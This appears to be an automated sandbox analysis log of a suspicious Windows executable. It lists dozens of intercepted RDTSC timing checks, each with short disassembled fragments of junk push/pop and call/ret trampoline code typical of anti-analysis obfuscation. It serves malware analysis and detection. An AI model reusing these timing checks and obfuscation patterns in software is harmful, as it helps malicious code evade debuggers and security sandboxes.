Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102449E second address: 10244BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94B29703h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10244BE second address: 10244C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10237D6 second address: 10237E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6D94B296F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102543A second address: 1025440 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1025440 second address: 1025459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D94B29704h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1025459 second address: 1025494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bx, di 0x0000000b movsx ebx, bx 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D3367h], ecx 0x00000016 push 00000000h 0x00000018 add bh, 0000000Bh 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d pushad 0x0000001e jnp 00007F6D94F51076h 0x00000024 jmp 00007F6D94F51082h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102648E second address: 10264AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94B29708h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102890E second address: 1028914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102A927 second address: 102A942 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jp 00007F6D94B296F6h 0x0000000d jmp 00007F6D94B296FDh 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102A942 second address: 102A948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102A948 second address: 102A952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6D94B296F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102AF88 second address: 102AF8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102E3EB second address: 102E46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29702h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F6D94B296F8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov bl, 6Dh 0x00000028 add edi, 3259D31Bh 0x0000002e push 00000000h 0x00000030 jnl 00007F6D94B296FCh 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F6D94B296F8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jp 00007F6D94B296F7h 0x00000058 clc 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jno 00007F6D94B296F6h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102E46F second address: 102E475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1028A83 second address: 1028AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B29709h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1028AA0 second address: 1028AAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1028AAE second address: 1028AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94B29702h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103166F second address: 10316BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb ebx, 589B1907h 0x0000000e push 00000000h 0x00000010 jmp 00007F6D94F5107Bh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F6D94F51078h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 adc bx, 24DCh 0x00000036 xor dword ptr [ebp+122D57D8h], eax 0x0000003c push eax 0x0000003d push ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 jne 00007F6D94F51076h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102B0F1 second address: 102B0F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102B0F7 second address: 102B0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102B0FB second address: 102B116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102D6F8 second address: 102D706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102D706 second address: 102D734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29704h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F6D94B2970Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6D94B296FDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102F5DD second address: 102F5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102F5E1 second address: 102F5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6D94B296FDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102F6D2 second address: 102F6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10317EE second address: 10317F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10317F4 second address: 10317F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10317F8 second address: 1031810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6D94B296FCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1032868 second address: 103286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103286D second address: 1032872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103729C second address: 10372A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCEA42 second address: FCEA56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F6D94B296F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FDC1E4 second address: FDC1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FDC1EC second address: FDC1FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6D94B296FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FDC1FE second address: FDC217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F6D94F51076h 0x0000000d jmp 00007F6D94F5107Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103B61E second address: 103B624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103B624 second address: 103B62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103B62A second address: 103B62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103B951 second address: 103B960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jc 00007F6D94F51076h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103BAD5 second address: 103BAD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103BAD9 second address: 103BAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6D94F51089h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 103BAFC second address: 103BB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104004B second address: 1040051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1040051 second address: 104008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6D94B29701h 0x0000000f js 00007F6D94B296FCh 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6D94B296FBh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104008F second address: 10400B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6D94F51085h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104025D second address: 1040270 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6D94B296F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1040270 second address: 1040274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046E46 second address: 1046E6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007F6D94B29708h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046E6C second address: 1046E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046E70 second address: 1046E7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10463DD second address: 10463E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10463E3 second address: 104640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F6D94B296F6h 0x0000000d jc 00007F6D94B296F6h 0x00000013 jmp 00007F6D94B29705h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046582 second address: 1046586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046586 second address: 10465AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29709h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F6D94B296FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10465AB second address: 10465AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10465AF second address: 10465CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6D94B296FFh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046A06 second address: 1046A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046A0C second address: 1046A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046A12 second address: 1046A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046A16 second address: 1046A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046A22 second address: 1046A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1046A26 second address: 1046A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 jl 00007F6D94B29707h 0x00000016 jmp 00007F6D94B296FFh 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCCED7 second address: FCCEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCCEDD second address: FCCEE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCCEE9 second address: FCCEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCCEED second address: FCCEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCCEF1 second address: FCCEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCCEF7 second address: FCCF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A003 second address: 104A009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A009 second address: 104A01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6D94B296FEh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C276 second address: 101C28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F51084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C455 second address: 101C465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C465 second address: 101C46A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C46A second address: 101C477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C477 second address: 101C47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C566 second address: 101C57B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29701h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C57B second address: 101C5EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F6D94F51078h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 add dword ptr [ebp+122D1E01h], edx 0x0000002a push 00000004h 0x0000002c or dword ptr [ebp+122D334Eh], ecx 0x00000032 nop 0x00000033 pushad 0x00000034 pushad 0x00000035 push edi 0x00000036 pop edi 0x00000037 jmp 00007F6D94F51082h 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6D94F5107Eh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101CCD4 second address: 101CCD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101CCD8 second address: 101CD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jns 00007F6D94F5107Ch 0x0000000e push edx 0x0000000f xor edi, dword ptr [ebp+122D1A7Fh] 0x00000015 pop edi 0x00000016 lea eax, dword ptr [ebp+124817C5h] 0x0000001c call 00007F6D94F51085h 0x00000021 mov dword ptr [ebp+122D29E1h], edx 0x00000027 pop edi 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jp 00007F6D94F5107Ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101CD25 second address: 101CD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6D94B296F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101CD2F second address: 101CD33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101CD33 second address: 101CD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6D94B296FCh 0x0000000f jo 00007F6D94B296F8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 jne 00007F6D94B296FBh 0x0000001f and di, 7C47h 0x00000024 lea eax, dword ptr [ebp+12481781h] 0x0000002a mov dword ptr [ebp+122D1B73h], eax 0x00000030 nop 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jne 00007F6D94B296F6h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101CD79 second address: FF8DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6D94F5107Ah 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jo 00007F6D94F51076h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 jl 00007F6D94F51076h 0x0000001f jo 00007F6D94F51076h 0x00000025 popad 0x00000026 popad 0x00000027 nop 0x00000028 call 00007F6D94F51080h 0x0000002d sbb cx, 675Fh 0x00000032 pop ecx 0x00000033 pushad 0x00000034 pushad 0x00000035 mov dword ptr [ebp+12449DFEh], ecx 0x0000003b mov di, C2E3h 0x0000003f popad 0x00000040 adc bh, FFFFFFDBh 0x00000043 popad 0x00000044 call dword ptr [ebp+1244B32Eh] 0x0000004a pushad 0x0000004b pushad 0x0000004c ja 00007F6D94F51076h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
